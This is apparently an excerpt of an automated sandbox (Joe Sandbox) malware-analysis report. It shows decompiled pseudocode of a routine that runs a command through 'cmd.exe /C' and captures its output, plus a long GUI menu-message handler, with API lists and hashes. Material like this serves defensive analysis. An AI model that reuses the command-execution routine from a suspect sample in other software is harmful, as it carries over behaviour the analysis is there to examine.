                                                                                                                                                                                                                            							 *((char*)(_t133 + _v24 - 0x178)) = 0;
                                                                                                                                                                                                                            							OemToCharA( &_v380,  &_v380);
                                                                                                                                                                                                                            							E00404C30( &_v388, 0x100,  &_v380);
                                                                                                                                                                                                                            							E00404C88(_t131, _v388);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} while (_t112 != 0 && _v24 != 0);
                                                                                                                                                                                                                            					WaitForSingleObject(_v124.hProcess, 0xffffffff);
                                                                                                                                                                                                                            					_pop(_t126);
                                                                                                                                                                                                                            					 *[fs:eax] = _t126;
                                                                                                                                                                                                                            					_push(0x47556a);
                                                                                                                                                                                                                            					CloseHandle(_v124.hThread);
                                                                                                                                                                                                                            					return CloseHandle(_v124);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                            0x0047544c
                                                                                                                                                                                                                            0x0047544c
                                                                                                                                                                                                                            0x0047546b
                                                                                                                                                                                                                            0x00475489
                                                                                                                                                                                                                            0x0047549c
                                                                                                                                                                                                                            0x004754a4
                                                                                                                                                                                                                            0x004754a6
                                                                                                                                                                                                                            0x004754ab
                                                                                                                                                                                                                            0x004754b2
                                                                                                                                                                                                                            0x0047556c
                                                                                                                                                                                                                            0x0047556f
                                                                                                                                                                                                                            0x00475572
                                                                                                                                                                                                                            0x00475580
                                                                                                                                                                                                                            0x004754b8
                                                                                                                                                                                                                            0x004754ba
                                                                                                                                                                                                                            0x004754bb
                                                                                                                                                                                                                            0x004754c0
                                                                                                                                                                                                                            0x004754c3
                                                                                                                                                                                                                            0x004754c6
                                                                                                                                                                                                                            0x004754dc
                                                                                                                                                                                                                            0x004754e4
                                                                                                                                                                                                                            0x004754e6
                                                                                                                                                                                                                            0x004754eb
                                                                                                                                                                                                                            0x004754f0
                                                                                                                                                                                                                            0x00475506
                                                                                                                                                                                                                            0x0047551c
                                                                                                                                                                                                                            0x00475529
                                                                                                                                                                                                                            0x00475529
                                                                                                                                                                                                                            0x0047552e
                                                                                                                                                                                                                            0x0047553e
                                                                                                                                                                                                                            0x00475545
                                                                                                                                                                                                                            0x00475548
                                                                                                                                                                                                                            0x0047554b
                                                                                                                                                                                                                            0x00475554
                                                                                                                                                                                                                            0x00475562
                                                                                                                                                                                                                            0x00475562

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000,?,?,?,?,00000000,004755BB), ref: 004753EE
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,00000000,00475581,?,?,?), ref: 00475426
                                                                                                                                                                                                                              • Part of subcall function 00409A58: GetFileAttributesA.KERNEL32(00000000,?,00473256,?,?,00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00409A63
                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,000000F6), ref: 0047549C
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,000000F6), ref: 004754AB
                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004754DC
                                                                                                                                                                                                                            • OemToCharA.USER32(00000000,00000000), ref: 00475506
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047553E
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000), ref: 00475554
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047555D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Handle$Close$CreateFile$AttributesCharObjectPipeProcessReadSingleWait
                                                                                                                                                                                                                            • String ID: C:\$D$cmd.exe /C
                                                                                                                                                                                                                            • API String ID: 3269375759-2807548070
                                                                                                                                                                                                                            • Opcode ID: 337c76df8ed0ba55073ab9dc257bd6663246026ec8d7fff9333260b9ae0deff7
                                                                                                                                                                                                                            • Instruction ID: 82437ea0ccec46d2af5a08e72f5cf6232f0238eba76bb00f3cc1c06be9a4dd54
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 337c76df8ed0ba55073ab9dc257bd6663246026ec8d7fff9333260b9ae0deff7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E5150B1904608AFDB10EFA5C881BDEB7B8EB48314F51457AF518F72C1DB785E448B68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                            			E0044EA40(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				struct HMENU__* _v12;
                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                            				char _v17;
                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                            				struct HDC__* _v32;
                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                            				intOrPtr* _v48;
                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                            				intOrPtr _t137;
                                                                                                                                                                                                                            				signed int _t138;
                                                                                                                                                                                                                            				intOrPtr _t144;
                                                                                                                                                                                                                            				signed int _t150;
                                                                                                                                                                                                                            				signed int _t151;
                                                                                                                                                                                                                            				intOrPtr* _t153;
                                                                                                                                                                                                                            				void* _t158;
                                                                                                                                                                                                                            				struct HMENU__* _t160;
                                                                                                                                                                                                                            				intOrPtr* _t165;
                                                                                                                                                                                                                            				void* _t173;
                                                                                                                                                                                                                            				signed int _t177;
                                                                                                                                                                                                                            				signed int _t181;
                                                                                                                                                                                                                            				void* _t182;
                                                                                                                                                                                                                            				void* _t214;
                                                                                                                                                                                                                            				struct HDC__* _t221;
                                                                                                                                                                                                                            				void* _t251;
                                                                                                                                                                                                                            				signed int _t257;
                                                                                                                                                                                                                            				void* _t265;
                                                                                                                                                                                                                            				signed int _t271;
                                                                                                                                                                                                                            				signed int _t272;
                                                                                                                                                                                                                            				signed int _t274;
                                                                                                                                                                                                                            				signed int _t275;
                                                                                                                                                                                                                            				signed int _t277;
                                                                                                                                                                                                                            				signed int _t278;
                                                                                                                                                                                                                            				signed int _t280;
                                                                                                                                                                                                                            				signed int _t281;
                                                                                                                                                                                                                            				signed int _t283;
                                                                                                                                                                                                                            				signed int _t284;
                                                                                                                                                                                                                            				signed int _t286;
                                                                                                                                                                                                                            				signed int _t287;
                                                                                                                                                                                                                            				signed int _t290;
                                                                                                                                                                                                                            				signed int _t291;
                                                                                                                                                                                                                            				intOrPtr _t307;
                                                                                                                                                                                                                            				intOrPtr _t311;
                                                                                                                                                                                                                            				intOrPtr _t333;
                                                                                                                                                                                                                            				intOrPtr _t342;
                                                                                                                                                                                                                            				intOrPtr _t346;
                                                                                                                                                                                                                            				intOrPtr* _t353;
                                                                                                                                                                                                                            				signed int _t355;
                                                                                                                                                                                                                            				intOrPtr* _t356;
                                                                                                                                                                                                                            				signed int _t367;
                                                                                                                                                                                                                            				signed int _t368;
                                                                                                                                                                                                                            				signed int _t369;
                                                                                                                                                                                                                            				signed int _t370;
                                                                                                                                                                                                                            				signed int _t371;
                                                                                                                                                                                                                            				signed int _t372;
                                                                                                                                                                                                                            				signed int _t373;
                                                                                                                                                                                                                            				intOrPtr* _t375;
                                                                                                                                                                                                                            				void* _t377;
                                                                                                                                                                                                                            				void* _t378;
                                                                                                                                                                                                                            				intOrPtr _t379;
                                                                                                                                                                                                                            				void* _t380;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t377 = _t378;
                                                                                                                                                                                                                            				_t379 = _t378 + 0xffffffd0;
                                                                                                                                                                                                                            				_v52 = 0;
                                                                                                                                                                                                                            				_t375 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_push(_t377);
                                                                                                                                                                                                                            				_push(0x44ef73);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t379;
                                                                                                                                                                                                                            				_t137 =  *__edx;
                                                                                                                                                                                                                            				_t380 = _t137 - 0x111;
                                                                                                                                                                                                                            				if(_t380 > 0) {
                                                                                                                                                                                                                            					_t138 = _t137 - 0x117;
                                                                                                                                                                                                                            					__eflags = _t138;
                                                                                                                                                                                                                            					if(_t138 == 0) {
                                                                                                                                                                                                                            						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                                                                                                                                                            						__eflags = _t271;
                                                                                                                                                                                                                            						if(_t271 < 0) {
                                                                                                                                                                                                                            							goto L67;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t272 = _t271 + 1;
                                                                                                                                                                                                                            							_t367 = 0;
                                                                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								_t150 = E0044DDEC(E0041AC6C(_v8, _t367),  *(_t375 + 4), __eflags);
                                                                                                                                                                                                                            								__eflags = _t150;
                                                                                                                                                                                                                            								if(_t150 != 0) {
                                                                                                                                                                                                                            									goto L68;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t367 = _t367 + 1;
                                                                                                                                                                                                                            								_t272 = _t272 - 1;
                                                                                                                                                                                                                            								__eflags = _t272;
                                                                                                                                                                                                                            								if(_t272 != 0) {
                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L67;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L68;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t151 = _t138 - 8;
                                                                                                                                                                                                                            						__eflags = _t151;
                                                                                                                                                                                                                            						if(_t151 == 0) {
                                                                                                                                                                                                                            							_v17 = 0;
                                                                                                                                                                                                                            							__eflags =  *(__edx + 6) & 0x00000010;
                                                                                                                                                                                                                            							if(( *(__edx + 6) & 0x00000010) != 0) {
                                                                                                                                                                                                                            								_v17 = 1;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                                                                                                                                                            							__eflags = _t274;
                                                                                                                                                                                                                            							if(__eflags < 0) {
                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                            								_t153 =  *0x49dbcc; // 0x49ebb8
                                                                                                                                                                                                                            								E0045B010( *_t153, 0, __eflags);
                                                                                                                                                                                                                            								goto L67;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t275 = _t274 + 1;
                                                                                                                                                                                                                            								_t368 = 0;
                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                            								while(1) {
                                                                                                                                                                                                                            									__eflags = _v17 - 1;
                                                                                                                                                                                                                            									if(_v17 != 1) {
                                                                                                                                                                                                                            										_v12 =  *(_t375 + 4) & 0x0000ffff;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_t160 =  *(_t375 + 8);
                                                                                                                                                                                                                            										__eflags = _t160;
                                                                                                                                                                                                                            										if(_t160 == 0) {
                                                                                                                                                                                                                            											_v12 = 0xffffffff;
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t158 = E0041AC6C(_v8, _t368);
                                                                                                                                                                                                                            									_t295 = _v17;
                                                                                                                                                                                                                            									_v16 = E0044DD30(_t158, _v17, _v12);
                                                                                                                                                                                                                            									__eflags = _v16;
                                                                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t368 = _t368 + 1;
                                                                                                                                                                                                                            									_t275 = _t275 - 1;
                                                                                                                                                                                                                            									__eflags = _t275;
                                                                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                                                                            										continue;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										goto L32;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									goto L68;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								E004380E0( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
                                                                                                                                                                                                                            								_t165 =  *0x49dbcc; // 0x49ebb8
                                                                                                                                                                                                                            								E0045B010( *_t165, _v52, __eflags);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							__eflags = _t151 == 1;
                                                                                                                                                                                                                            							if(_t151 == 1) {
                                                                                                                                                                                                                            								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                                                                                                                                                            								__eflags = _t277;
                                                                                                                                                                                                                            								if(_t277 < 0) {
                                                                                                                                                                                                                            									goto L67;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t278 = _t277 + 1;
                                                                                                                                                                                                                            									_t369 = 0;
                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                            									while(1) {
                                                                                                                                                                                                                            										_v48 = E0041AC6C(_v8, _t369);
                                                                                                                                                                                                                            										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
                                                                                                                                                                                                                            										__eflags = _t173 -  *(_t375 + 8);
                                                                                                                                                                                                                            										if(_t173 ==  *(_t375 + 8)) {
                                                                                                                                                                                                                            											break;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_t177 = E0044DD30(_v48, 1,  *(_t375 + 8));
                                                                                                                                                                                                                            										__eflags = _t177;
                                                                                                                                                                                                                            										if(_t177 == 0) {
                                                                                                                                                                                                                            											_t369 = _t369 + 1;
                                                                                                                                                                                                                            											_t278 = _t278 - 1;
                                                                                                                                                                                                                            											__eflags = _t278;
                                                                                                                                                                                                                            											if(_t278 != 0) {
                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												goto L67;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											break;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										goto L68;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									E0044E630(_v48, _t375);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L67;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L68;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(_t380 == 0) {
                                                                                                                                                                                                                            						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                                                                                                                                                            						__eflags = _t280;
                                                                                                                                                                                                                            						if(_t280 < 0) {
                                                                                                                                                                                                                            							goto L67;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t281 = _t280 + 1;
                                                                                                                                                                                                                            							_t370 = 0;
                                                                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								E0041AC6C(_v8, _t370);
                                                                                                                                                                                                                            								_t181 = E0044DDD0( *(_t375 + 4), __eflags);
                                                                                                                                                                                                                            								__eflags = _t181;
                                                                                                                                                                                                                            								if(_t181 != 0) {
                                                                                                                                                                                                                            									goto L68;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t370 = _t370 + 1;
                                                                                                                                                                                                                            								_t281 = _t281 - 1;
                                                                                                                                                                                                                            								__eflags = _t281;
                                                                                                                                                                                                                            								if(_t281 != 0) {
                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L67;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L68;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L68;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t182 = _t137 - 0x2b;
                                                                                                                                                                                                                            						if(_t182 == 0) {
                                                                                                                                                                                                                            							_v40 =  *((intOrPtr*)(__edx + 8));
                                                                                                                                                                                                                            							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                                                                                                                                                            							__eflags = _t283;
                                                                                                                                                                                                                            							if(_t283 < 0) {
                                                                                                                                                                                                                            								goto L67;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t284 = _t283 + 1;
                                                                                                                                                                                                                            								_t371 = 0;
                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                            								while(1) {
                                                                                                                                                                                                                            									_v16 = E0044DD30(E0041AC6C(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
                                                                                                                                                                                                                            									__eflags = _v16;
                                                                                                                                                                                                                            									if(_v16 != 0) {
                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t371 = _t371 + 1;
                                                                                                                                                                                                                            									_t284 = _t284 - 1;
                                                                                                                                                                                                                            									__eflags = _t284;
                                                                                                                                                                                                                            									if(_t284 != 0) {
                                                                                                                                                                                                                            										continue;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										goto L67;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									goto L69;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_v24 = E0042572C(0, 1);
                                                                                                                                                                                                                            								_push(_t377);
                                                                                                                                                                                                                            								_push(0x44eda6);
                                                                                                                                                                                                                            								_push( *[fs:eax]);
                                                                                                                                                                                                                            								 *[fs:eax] = _t379;
                                                                                                                                                                                                                            								_v28 = SaveDC( *(_v40 + 0x18));
                                                                                                                                                                                                                            								_push(_t377);
                                                                                                                                                                                                                            								_push(0x44ed89);
                                                                                                                                                                                                                            								_push( *[fs:eax]);
                                                                                                                                                                                                                            								 *[fs:eax] = _t379;
                                                                                                                                                                                                                            								E00425CE8(_v24,  *(_v40 + 0x18));
                                                                                                                                                                                                                            								E00425B88(_v24);
                                                                                                                                                                                                                            								E0044F218(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
                                                                                                                                                                                                                            								_pop(_t333);
                                                                                                                                                                                                                            								 *[fs:eax] = _t333;
                                                                                                                                                                                                                            								_push(0x44ed90);
                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                            								E00425CE8(_v24, 0);
                                                                                                                                                                                                                            								return RestoreDC( *(_v40 + 0x18), _v28);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t214 = _t182 - 1;
                                                                                                                                                                                                                            							if(_t214 == 0) {
                                                                                                                                                                                                                            								_v44 =  *((intOrPtr*)(__edx + 8));
                                                                                                                                                                                                                            								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                                                                                                                                                            								__eflags = _t286;
                                                                                                                                                                                                                            								if(_t286 < 0) {
                                                                                                                                                                                                                            									goto L67;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t287 = _t286 + 1;
                                                                                                                                                                                                                            									_t372 = 0;
                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                            									while(1) {
                                                                                                                                                                                                                            										_v16 = E0044DD30(E0041AC6C(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
                                                                                                                                                                                                                            										__eflags = _v16;
                                                                                                                                                                                                                            										if(_v16 != 0) {
                                                                                                                                                                                                                            											break;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_t372 = _t372 + 1;
                                                                                                                                                                                                                            										_t287 = _t287 - 1;
                                                                                                                                                                                                                            										__eflags = _t287;
                                                                                                                                                                                                                            										if(_t287 != 0) {
                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											goto L67;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t221 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                                                                            									L00407730();
                                                                                                                                                                                                                            									_v32 = _t221;
                                                                                                                                                                                                                            									 *[fs:eax] = _t379;
                                                                                                                                                                                                                            									_v24 = E0042572C(0, 1);
                                                                                                                                                                                                                            									 *[fs:eax] = _t379;
                                                                                                                                                                                                                            									_v28 = SaveDC(_v32);
                                                                                                                                                                                                                            									 *[fs:eax] = _t379;
                                                                                                                                                                                                                            									E00425CE8(_v24, _v32);
                                                                                                                                                                                                                            									E00425B88(_v24);
                                                                                                                                                                                                                            									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44eea7, _t377,  *[fs:eax], 0x44eec4, _t377,  *[fs:eax], 0x44eee9, _t377, _t221);
                                                                                                                                                                                                                            									_pop(_t342);
                                                                                                                                                                                                                            									 *[fs:eax] = _t342;
                                                                                                                                                                                                                            									_push(0x44eeae);
                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                            									E00425CE8(_v24, 0);
                                                                                                                                                                                                                            									return RestoreDC(_v32, _v28);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								if(_t214 == 0x27) {
                                                                                                                                                                                                                            									_v36 =  *((intOrPtr*)(__edx + 8));
                                                                                                                                                                                                                            									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                                                                                                                                                            									__eflags = _t290;
                                                                                                                                                                                                                            									if(_t290 < 0) {
                                                                                                                                                                                                                            										goto L67;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_t291 = _t290 + 1;
                                                                                                                                                                                                                            										_t373 = 0;
                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                            										while(1) {
                                                                                                                                                                                                                            											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E0041AC6C(_v8, _t373))) + 0x34))();
                                                                                                                                                                                                                            											_t346 = _v36;
                                                                                                                                                                                                                            											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
                                                                                                                                                                                                                            											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
                                                                                                                                                                                                                            												_v16 = E0044DD30(E0041AC6C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												_v16 =  *((intOrPtr*)(E0041AC6C(_v8, _t373) + 0x34));
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eflags = _v16;
                                                                                                                                                                                                                            											if(_v16 != 0) {
                                                                                                                                                                                                                            												break;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											_t373 = _t373 + 1;
                                                                                                                                                                                                                            											_t291 = _t291 - 1;
                                                                                                                                                                                                                            											__eflags = _t291;
                                                                                                                                                                                                                            											if(_t291 != 0) {
                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												goto L67;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											goto L68;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_t257 = E0044DD60(E0041AC6C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
                                                                                                                                                                                                                            										__eflags = _t257;
                                                                                                                                                                                                                            										if(_t257 == 0) {
                                                                                                                                                                                                                            											_t265 = E0041AC6C(_v8, _t373);
                                                                                                                                                                                                                            											__eflags = 0;
                                                                                                                                                                                                                            											_t257 = E0044DD60(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_t353 =  *0x49de0c; // 0x49ebbc
                                                                                                                                                                                                                            										_t355 =  *( *_t353 + 0x6c);
                                                                                                                                                                                                                            										__eflags = _t355;
                                                                                                                                                                                                                            										if(_t355 != 0) {
                                                                                                                                                                                                                            											__eflags = _t257;
                                                                                                                                                                                                                            											if(_t257 == 0) {
                                                                                                                                                                                                                            												_t257 =  *(_t355 + 0x158);
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											_t307 =  *0x49de0c; // 0x49ebbc
                                                                                                                                                                                                                            											__eflags =  *(_t355 + 0x228) & 0x00000008;
                                                                                                                                                                                                                            											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
                                                                                                                                                                                                                            												_t356 =  *0x49dbcc; // 0x49ebb8
                                                                                                                                                                                                                            												E0045ACB4( *_t356, _t291, _t307, _t257, _t373, _t375);
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												E0045AD1C();
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									L67:
                                                                                                                                                                                                                            									_push( *(_t375 + 8));
                                                                                                                                                                                                                            									_push( *(_t375 + 4));
                                                                                                                                                                                                                            									_push( *_t375);
                                                                                                                                                                                                                            									_t144 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                                                                            									_push(_t144);
                                                                                                                                                                                                                            									L00407540();
                                                                                                                                                                                                                            									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								L68:
                                                                                                                                                                                                                            								_pop(_t311);
                                                                                                                                                                                                                            								 *[fs:eax] = _t311;
                                                                                                                                                                                                                            								_push(0x44ef7a);
                                                                                                                                                                                                                            								return E004049C0( &_v52);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L69:
                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                            0x0044eb22
                                                                                                                                                                                                                            0x0044eb24
                                                                                                                                                                                                                            0x0044eb9a
                                                                                                                                                                                                                            0x0044eb9a
                                                                                                                                                                                                                            0x0044eba3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb26
                                                                                                                                                                                                                            0x0044eb26
                                                                                                                                                                                                                            0x0044eb27
                                                                                                                                                                                                                            0x0044eb27
                                                                                                                                                                                                                            0x0044eb29
                                                                                                                                                                                                                            0x0044eb29
                                                                                                                                                                                                                            0x0044eb2d
                                                                                                                                                                                                                            0x0044eb53
                                                                                                                                                                                                                            0x0044eb2f
                                                                                                                                                                                                                            0x0044eb2f
                                                                                                                                                                                                                            0x0044eb32
                                                                                                                                                                                                                            0x0044eb34
                                                                                                                                                                                                                            0x0044eb46
                                                                                                                                                                                                                            0x0044eb36
                                                                                                                                                                                                                            0x0044eb41
                                                                                                                                                                                                                            0x0044eb41
                                                                                                                                                                                                                            0x0044eb34
                                                                                                                                                                                                                            0x0044eb5b
                                                                                                                                                                                                                            0x0044eb60
                                                                                                                                                                                                                            0x0044eb6b
                                                                                                                                                                                                                            0x0044eb6e
                                                                                                                                                                                                                            0x0044eb72
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb96
                                                                                                                                                                                                                            0x0044eb97
                                                                                                                                                                                                                            0x0044eb97
                                                                                                                                                                                                                            0x0044eb98
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb98
                                                                                                                                                                                                                            0x0044eb7d
                                                                                                                                                                                                                            0x0044eb85
                                                                                                                                                                                                                            0x0044eb8c
                                                                                                                                                                                                                            0x0044eb8c
                                                                                                                                                                                                                            0x0044ea96
                                                                                                                                                                                                                            0x0044ea96
                                                                                                                                                                                                                            0x0044ea97
                                                                                                                                                                                                                            0x0044ef00
                                                                                                                                                                                                                            0x0044ef01
                                                                                                                                                                                                                            0x0044ef03
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ef05
                                                                                                                                                                                                                            0x0044ef05
                                                                                                                                                                                                                            0x0044ef06
                                                                                                                                                                                                                            0x0044ef06
                                                                                                                                                                                                                            0x0044ef08
                                                                                                                                                                                                                            0x0044ef12
                                                                                                                                                                                                                            0x0044ef1a
